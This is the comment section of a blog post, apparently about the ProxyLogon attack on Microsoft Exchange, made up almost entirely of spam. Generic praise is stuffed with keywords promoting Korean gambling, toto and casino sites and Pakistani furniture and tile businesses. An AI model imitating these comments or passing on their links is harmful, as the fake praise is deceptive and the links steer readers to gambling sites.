  113. As I am looking at your writing, I regret being unable to do outdoor activities due to Corona 19, and I miss my old daily life. If you also miss the daily life of those days, would you please visit my site once? My site is a site where I post about photos and daily life when I was free.keo nha cai

    回覆刪除
  114. I think a lot of articles related to are disappearing someday. That's why it's very hard to find, but I'm very fortunate to read your writing. When you come to my site, I have collected articles related to 크레이지슬롯 .

    回覆刪除
  115. I finally found what I was looking for! I'm so happy. 사설토토사이트 Your article is what I've been looking for for a long time. I'm happy to find you like this. Could you visit my website if you have time? I'm sure you'll find a post of interest that you'll find interesting.

    回覆刪除
  116. This blog was very nicely formatted; it maintained a flow from the first word to the last. ranboo varsity jacket

    回覆刪除
  117. Pretty nice post. I just stumbled upon your blog and wanted to mention that I've really loved browsing your weblog posts. In any case I'll be subscribing to your rss feed and I'm hoping you write again very soon! ufabet

    回覆刪除
  118. When did it start? The day I started surfing the Internet to read articles related to . I've been fond of seeing various sites related to 카지노사이트 around the world for over 10 years. Among them, I saw your site writing articles related to and I am very satisfied.

    回覆刪除
  119. First of all, thank you for letting me see this information. I think this article can give me a lot of inspiration. I would appreciate 바카라사이트 if you could post more good contents in the future.

    回覆刪除
  120. I always think about what is. It seems to be a perfect article that seems to blow away such worries. 온카지노 seems to be the best way to show something. When you have time, please write an article about what means!!

    回覆刪除
  121. Extremely decent blog and articles. I am realy extremely glad to visit your blog. Presently I am discovered which I really need. I check your blog regular and attempt to take in something from your blog. Much obliged to you and sitting tight for your new post.메이저사이트모음

    回覆刪除
  122. Thanks for your marvelous posting! I certainly enjoyed reading
    it, you might be a great author. I will ensure that I bookmark your blog lakers jacket starter
    and will come back from now on. I want to encourage you continue
    your great writing, have a nice holiday weekend!

    回覆刪除
  123. My curiosity was solved by looking at your writing. Your writing was helpful to me. 룰렛사이트 I want to help you too.

    回覆刪除
  124. Hello! Nice to meet you, I say . The name of the community I run is 안전놀이터추천, and the community I run contains articles similar to your blog. If you have time, I would be very grateful if you visit my site .

    回覆刪除
  125. That’s truly has added a lot to our knowledge about this topic. It has a lot of key elements that truly make it work. Have more success in your journey. Really very happy to say, your post is very interesting to read.
    Malik Furniture
    Leather Recliner Sofa Set
    Accent Chairs for Bedroom
    Armchairs and Accent Chairs
    Chairs for Bedroom
    Coffee Table for Living Room
    Dining Sets for Small Spaces
    Farmhouse Living Room Furniture

    回覆刪除
  126. It's an amazing article. I admire this article for its well-researched content and excellent work. I got so involved in this material that I couldn’t stop reading.
    Furniture 4U
    Gaming Chair Price in Pakistan
    Office Chair Price in Pakistan
    Computer Table Price in Pakistan
    Sofa Set Price in Pakistan
    Office Table Price in Pakistan

    回覆刪除
  127. Fantastic post, very informative. I wonder why the other specialists of this sector do not notice this. You must continue your writing. I am confident, you have a great readers’ base already!
    Yamas Furniture
    Office Furniture in Karachi
    office chairs in Karachi
    office table in Karachi
    study table in Karachi
    computer chair in Karachi
    computer table in Karachi
    Revolving Chair in Karachi

    回覆刪除
  128. Hello, I have browsed most of your posts. This post is probably where I got the most useful information for my research. Thanks for posting, maybe we can see more on this.
    Fumigation Services Karachi
    Termite Treatment Services in Karachi
    Water Tank Cleaning Services in Karachi
    Fumigation Services in Karachi

    回覆刪除
  129. Pretty good post. I just stumbled upon your blog and wanted to say that I have really enjoyed reading your blog posts. Any way I’ll be subscribing to your feed and I hope you post again soon.
    Jewel Studio
    Jewellery Design in Karachi Pakistan
    Earrings Design in Pakistan
    Bracelet Designs in Karachi
    Necklace Design in Pakistan
    Gold Rings Price in Karachi
    Rings for Girls in Pakistan

    回覆刪除
  130. The article is actually the best topic on this registry related issue. I fit in with your conclusions and will eagerly look forward to your next updates. Just saying thanks will not just be sufficient.
    Tiles in Pakistan
    Khaprail Tiles
    Bathroom & Washroom Tiles
    Floor Tiles Design
    Kitchen Tiles Design Pakistan
    Sanitary fittings Services
    Wall Tiles

    回覆刪除
  131. It's extremely educational and you are clearly exceptionally proficient around there. You have opened my eyes to differing sees on this point with fascinating and strong substance. เว็บแทงบอล

    回覆刪除
  132. Wonderful story, reckoned we could combine a few unrelated data, nevertheless definitely really worth taking a search, whoa did one particular study about Mid East has got additional problerms at the same time 바카라사이트

    回覆刪除
  133. Your way of telling everything in this article is genuinely pleasant, all can easily understand it, Thanks a lot 토토사이트

    回覆刪除
  134. From some point on, I am preparing to build my site while browsing various sites. It is now somewhat completed. If you are interested, please come to play with 카지노사이트

    回覆刪除
  135. This is an awesome article, Given such an extraordinary measure of data in it, These sort of articles keeps the customers excitement for the site, and keep sharing more ... favorable circumstances. 카지노사이트

    回覆刪除
  136. Eu teria que examinar com você aqui. O que não é uma coisa que eu costumo fazer! Tenho prazer em ler um post que pode fazer as pessoas pensarem. Além disso, obrigado por me permitir comentar!


    https://www.safecasinosite.net

    回覆刪除
  137. Wow! Such an amazing and helpful post this is. I really really love it. It's so good and so awesome. I am just amazed. I hope that you continue to do your work like this in the future also. ufabet168

    回覆刪除
  138. That is a great tip particularly to those new to the blogosphere.
    Simple but very accurate info? Thank you for sharing this one.
    A must read post!
    Appreciating the hard work you put into your site and detailed information you present.
    Wonderful read!
    토토사이트

    回覆刪除
  139. I love to recommend you Where can crawl Exciting Products latest Jackets, Coats and Vests Click Here Def Jam Jacket

    回覆刪除
  140. Great articles and great layout. Your blog post deserves all of the positive feedback it’s been getting. 바카라사이트

    回覆刪除
  141. If you are looking for more information about flat rate locksmith Las Vegas check that right away. fate organization

    回覆刪除
  142. This particular papers fabulous, and My spouse and i enjoy each of the perform that you have placed into this. I’m sure that you will be making a really useful place. I has been additionally pleased. Good perform! fate

    回覆刪除
  143. This is the post I was looking for 메이저사이트 I am very happy to finally read about the Thank you very much. Your post was of great help to me. If you are interested in the column I wrote, please visit my site .

    回覆刪除
  144. Thanks and keep sharing such valuable updates through your side. You can also visit
    เว็บ igoal

    回覆刪除
  145. Many thanks for the article, I have a lot of spray lining knowledge but always learn something new. Keep up the good work and thank you again. 먹튀사이트

    回覆刪除
  146. It seems like I've never seen an article of a kind like . It literally means the best thorn. It seems to be a fantastic article. It is the best among articles related to 메이저안전놀이터. seems very easy, but it's a difficult kind of article, and it's perfect.

    回覆刪除
  147. Hey what a brilliant post I have come across and believe me I have been searching out for this similar kind of post for past a week and hardly came across this. Thank you very much and will look for more postings from you. 먹튀검증 and I am very happy to see your post just in time and it was a great help. Thank you ! Leave your blog address below. Please visit me anytime!

    回覆刪除
  148. When did you start writing articles related to ? To write a post by reinterpreting the 메이저사이트추천 I used to know is amazing. I want to talk more closely about , can you give me a message?

    回覆刪除
  149. What a nice post! I'm so happy to read this. 토토사이트추천 What you wrote was very helpful to me. Thank you. Actually, I run a site similar to you. If you have time, could you visit my site? Please leave your comments after reading what I wrote. If you do so, I will actively reflect your opinion. I think it will be a great help to run my site. Have a good day.

    回覆刪除
  150. It has fully emerged to crown Singapore's southern shores and undoubtedly placed her on the global map of residential landmarks. I still scored the more points than I ever have in a season for GS. I think you would be hard pressed to find somebody with the same consistency I have had over the years so I am happy with that. 메이저토토사이트

    回覆刪除
  151. Hey friend, it is very well written article, thank you for the valuable and useful information you provide in this post. Keep up the good work! FYI, Pet Care adda
    Credit card processing, why i am an atheist pdf,10 Lines on Chhatrapati Shivaji in English

    回覆刪除
  152. While looking for articles on these topics, I came across this article on the site here. As I read your article, I felt like an expert in this field. I have several articles on these topics posted on my site. Could you please visit my homepage? 메이저놀이터순위

    回覆刪除
  153. It's amazing Everything you write has meaning. I want to read in everyone. สมัคร ag gaming

    回覆刪除
  154. I'm so happy to finally find a post with what I want. 메이저토토사이트 You have inspired me a lot. If you are satisfied, please visit my website and leave your feedback.

    回覆刪除
  155. Found your post interesting to read. I cant wait to see your post soon. Good Luck with the upcoming update. 룰렛사이트탑

    回覆刪除
  156. 스포츠토토
    You make so many great points here that I read your article a couple of times. Your views are in accordance with my own for the most part. This is great content for your readers. Feel free to visit my website;

    回覆刪除
  157. Keep it up the good work. Your article is really looked nice and great because in this way we can learn a lot of things in our life.

    Information Hub | Red fortz | Information Hub | Red For TZ | General Blog

    回覆刪除
  158. When I read your article on this topic, the first thought seems profound and difficult. There is also a bulletin board for discussion of articles and photos similar to this topic on my site, but I would like to visit once when I have time to discuss this topic. 안전토토사이트

    回覆刪除
  159. Good morning!! I am also blogging with you. In my blog, articles related to are mainly written, and they are usually called 메이저사이트. If you are curious about , please visit!!

    回覆刪除
  160. Hello, I read the post well. 안전놀이터추천 It's a really interesting topic and it has helped me a lot. In fact, I also run a website with similar content to your posting. Please visit once

    回覆刪除
  161. I've been looking for photos and articles on this topic over the past few days due to a school assignment, 파워볼사이트 and I'm really happy to find a post with the material I was looking for! I bookmark and will come often! Thanks :D

    回覆刪除
  162. I think your website has a lot of useful knowledge. I'm so thankful for this website.
    I hope that you continue to share a lot of knowledge.
    This is my website.
    머니상

    回覆刪除
  163. "In the wake of a few blog segments on your site, I truly like your scattering content to a blog limits. I saved it 토토사이트
    to my standard site list and will check again soon
    In the event that it's not all that aggregate bother, moreover visit my site and let me know your point of view.
    "

    回覆刪除
  164. I'm so happy to finally find a post with what I want. 안전놀이터순위 You have inspired me a lot. If you are satisfied, please visit my website and leave your feedback.

    回覆刪除
  165. https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html?showComment=1646114148611&m=1#c3374614271886867203

    回覆刪除